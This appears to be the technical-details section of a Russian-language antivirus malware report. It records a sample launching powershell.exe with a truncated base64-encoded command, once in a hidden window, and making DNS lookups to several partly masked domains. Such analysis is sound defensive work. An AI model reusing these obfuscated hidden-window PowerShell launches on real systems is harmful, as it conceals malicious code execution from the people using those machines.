Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABzAG8AbAB1AHQAaQBvAG4AcwB3AG4AagA9ACcAVgBpAHMAaQBvAG4AbwByAGkAZQBuAHQAZQBkAG4AZgB6ACcAOwAkAHAAYQByAHMAZQBzAHQAZAAgAD0AIAAnADYANgAxACcAOwAkAEIAbwByAGQAZQByAHMAawBrAHYAPQAnAEQAZQB2AGUAbAB...
- DNS ASK ap######.bangunrumah-kita.com
- DNS ASK al####awater.com
- DNS ASK an####egimenez.com
- DNS ASK au######o-ecole-vauban.fr
- DNS ASK av#######.amsi-formations.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABzAG8AbAB1AHQAaQBvAG4AcwB3AG4AagA9ACcAVgBpAHMAaQBvAG4AbwByAGkAZQBuAHQAZQBkAG4AZgB6ACcAOwAkAHAAYQByAHMAZQBzAHQAZAAgAD0AIAAnADYANgAxACcAOwAkAEIAbwByAGQAZQByAHMAawBrAHYAPQAnAEQAZQB2AGUAbAB...' (со скрытым окном)